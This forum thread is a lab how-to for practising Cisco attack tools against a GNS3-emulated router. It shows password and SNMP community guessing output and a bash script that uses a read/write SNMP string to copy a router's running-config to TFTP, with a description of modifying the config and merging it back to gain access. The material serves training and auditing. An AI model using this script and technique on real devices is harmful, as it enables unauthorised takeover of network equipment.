Results 1 to 2 of 2

Thread: Backtrack 4 cisco tool practice

  1. #1
    Senior Member iproute's Avatar
    Join Date
    Jan 2010
    Location
    Midwest, USA
    Posts
    192

    Default Backtrack 4 cisco tool practice using GNS3

    There are a few simple cisco tools included with backtrack that can be handy for your audits. The purpose of this HOWTO is to demonstrate how these tools can be practiced with (maybe even customized for a given audit and tested) without needing any actual cisco gear on hand.

    First, we'll install GNS3, which is a handy cisco IOS emulator(think VMWare for cisco routers) and allows you to build a topology very easily.

    Code:
    root@bt:~#apt-get install gns3
    and you'll also want bridge-utils and uml-utilities. I know bridge-utils is already included with backtrack 4r1, so we'll just add the uml-utilities.
    Code:
    root@bt:~#apt-get install uml-utilities
    Now we need to set up our networking so that our VM router can speak to our LAN.
    Code:
    root@bt:~# tunctl
    Set 'tap0' persistent and owned by uid 0
    root@bt:~# brctl addbr br0
    root@bt:~# ifconfig eth0 down
    root@bt:~# ifconfig eth0 0.0.0.0 promisc up
    root@bt:~# ifconfig tap0 0.0.0.0 promisc up
    root@bt:~# brctl addif br0 eth0
    root@bt:~# brctl addif br0 tap0
    root@bt:~# dhclient br0
    Now we open gns3. It can be found in the menu under utilities, or from a terminal;
    Code:
    root@bt:~#gns3 &
    You'll need to add a cisco IOS image to use. They aren't that difficult to get your hands on. I recommend using something at least version 12.4
    I was able to procure mine without too much difficulty through my work.
    I'll leave obtaining one up to you. For more information on using GNS3 go to
    GNS3 | Graphical Network Simulator
    If some of you are more comfortable in windows, GNS3 is available for that as well. Great tool for studying for cisco certifications.
    Anyway with windows you can do the same thing as far as putting a virtual cisco router on your lan, then attacking it with your backtrack VM. This howto is from the perspective of a backtrack HD install or live-dvd run

    I have a short video of setting up things in GNS3 up to opening a console to the router. It is fairly straight forward. I'll also include a sample of my cisco config I used to run a quick test with the cisco auditing tool included in backtrack.


    Here is my demo video of setting up GNS
    GNS3 Backtrack testing
    Here is my sample router config I used to test the cisco auditing tool.
    Code:
    !
    version 12.4
    service timestamps debug datetime msec
    service timestamps log datetime msec
    service password-encryption
    !
    hostname Router
    !
    boot-start-marker
    boot-end-marker
    !
    enable secret 5 $1$7bje$QqifV/x2cw1y16WdwL.Cd0
    !
    no aaa new-model
    memory-size iomem 5
    ip cef
    !
    !
    !
    !
    !
    !
    !
    interface FastEthernet0/0
     ip address dhcp
     duplex auto
     speed auto
    !
    interface FastEthernet0/1
     no ip address
     shutdown
     duplex auto
     speed auto
    !
    interface FastEthernet1/0
     no ip address
     shutdown
     duplex auto
     speed auto
    !
    ip forward-protocol nd
    !
    ip http server
    !
    snmp-server community public RO
    snmp-server community private RO
    !
    !
    !
    control-plane
    !
    !
    !
    gatekeeper
     shutdown
    !
    !
    line con 0
    line aux 0
    line vty 0 4
     password 7 045802150C2E
     login
    !
    !
    end
    Here is a video of me using the cisco auditing tool included with backtrack against my 3745 virtual router.
    Cisco Auditing Tool
    And here is the text howto of running the cisco audit tool
    Code:
    root@bt:/pentest/cisco/cisco-auditing-tool# ./CAT -h 192.168.25.136
    
    Cisco Auditing Tool - g0ne [null0]
    
    Checking Host: 192.168.25.136
    
    
    Guessing passwords:
    
    Password Found: cisco
    Invalid Password: ciscos
    Invalid Password: cisco1
    Invalid Password: router
    Invalid Password: router1
    Invalid Password: admin
    Invalid Password: Admin
    
    
    Guessing Community Names:
    
    Community Name Found: public
    Community Name Found: private
    
    ---------------------------------------------------
    
    Audit Complete
    I will continue to work on getting the other cisco tools in here such as the copy router config, and merge router config, but it may be a bit of time
    Last edited by iproute; 11-24-2010 at 10:48 PM.

  2. #2
    Senior Member iproute's Avatar
    Join Date
    Jan 2010
    Location
    Midwest, USA
    Posts
    192

    Default Re: Backtrack 4 cisco tool practice

    Here is a short script I wrote to grab a cisco config from a device as long as you know the read/write SNMP community string. For reasons unclear to me I could not get .copy-router-config.pl to work. FYI, my scripting-fu is not strong as of yet, but I can do simple things. Always open to suggestions....

    Code:
    #! /bin/bash
    
    echo "Please enter router IP:"
    read device
    echo "Please enter TFTP server IP:"
    read tftp
    echo "Please enter SNMP community read/write string"
    read community
    echo "Please enter the local filename:"
    read filename
    
    snmpset -c $community -v 1 $device 1.3.6.1.4.1.9.9.96.1.1.1.1.14.111 i 6
    #Destroys settings for OID
    
    snmpset -c $community -v 1 $device 1.3.6.1.4.1.9.9.96.1.1.1.1.2.111 i 1
    #The ConfigCopyProtocol is set to TFTP
    
    snmpset -c $community -v 1 $device 1.3.6.1.4.1.9.9.96.1.1.1.1.3.111 i 4
    #Set the SourceFileType to running-config
    
    snmpset -c $community -v 1 $device 1.3.6.1.4.1.9.9.96.1.1.1.1.4.111 i 1
    #Set the DestinationFileType to networkfile
    
    snmpset -c $community -v 1 $device 1.3.6.1.4.1.9.9.96.1.1.1.1.5.111 a $tftp
    #Sets the ServerAddress to the IP address of the TFTP server
    
    snmpset -c $community -v 1 $device 1.3.6.1.4.1.9.9.96.1.1.1.1.6.111 s $filename
    #Sets the CopyFilename to your desired file name.
    
    snmpset -c $community -v 1 $device 1.3.6.1.4.1.9.9.96.1.1.1.1.14.111 i 1
    #Sets the CopyStatus to active which starts the copy process.
    
    snmpset -c $community -v 1 $device 1.3.6.1.4.1.9.9.96.1.1.1.1.14.111 i 6
    #Destroys settings for OID
    copy the code into kate, then chmod +x the file you saved. Not sure I can help too much if this script doesn't work, but I will make an effort.

    Here is the config I was using with the router before 'exploiting' it.
    Code:
    !
    version 12.4
    service timestamps debug datetime msec
    service timestamps log datetime msec
    service password-encryption
    !
    hostname Router
    !
    boot-start-marker
    boot-end-marker
    !
    enable password notcisco
    !
    no aaa new-model
    memory-size iomem 5
    ip cef
    !
    !
    !
    !
    !
    !
    !
    !
    !
    !
    !
    !
    !
    !
    !
    !
    !
    !
    !
    !
    !
    interface FastEthernet0/0
     ip address dhcp
     duplex auto
     speed auto
    !
    interface FastEthernet0/1
     no ip address
     shutdown
     duplex auto
     speed auto
    !
    interface FastEthernet1/0
     no ip address
     shutdown
     duplex auto
     speed auto
    !
    ip forward-protocol nd
    !
    ip http server
    !
    snmp-server community public RO
    snmp-server community private RW
    !
    !
    !
    control-plane
    !
    !
    !
    !
    !
    !
    !
    !
    gatekeeper
     shutdown
    !
    !
    line con 0
    line aux 0
    line vty 0 4
     password notcisco
     login
    !
    !
    end
    I did make some changes to the router config to simplify things for this demo.
    Here is a short vid of using the audit tool, with which we 'discover' that an SNMP community string called private exists, which we find also has read/write access. I use my script to copy the config, edit the config as needed to grant us access, then merge it back to the router with Muts' merge-router-config.pl script.
    Here is the vid

    I seriously hope no one ever finds an SNMP config anywhere in production configured like this, but I feel it effectively demonstrates gns3 can be used to develop or modify tools for cisco platforms, without needing any gear around.

    EDIT: I'm still working to add info and improve the quality of this howto, but bear in mind, my time is divided terribly right now.
    Last edited by iproute; 11-19-2010 at 04:31 PM.

Similar Threads

  1. [cisco-ocs] - Backtrack 4 - Cisco OCS Mass Scanner
    By firebits in forum Suporte Software
    Replies: 0
    Last Post: 04-09-2010, 08:00 PM
  2. [cisco-auditing-tool] - Backtrack 4
    By firebits in forum Suporte Software
    Replies: 0
    Last Post: 04-09-2010, 07:53 PM
  3. Tool to brute force Cisco VPN (tcp/10000)?
    By The Dan in forum OLD Pentesting
    Replies: 4
    Last Post: 02-26-2009, 09:21 PM
  4. Good Tool for cisco devices.
    By imported_demente in forum OLD Pentesting
    Replies: 0
    Last Post: 03-14-2008, 10:36 PM
  5. Cisco Auditing Tool
    By chrisbdaemon in forum OLD BT3beta Bugs and Fixes
    Replies: 5
    Last Post: 12-22-2007, 08:00 AM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •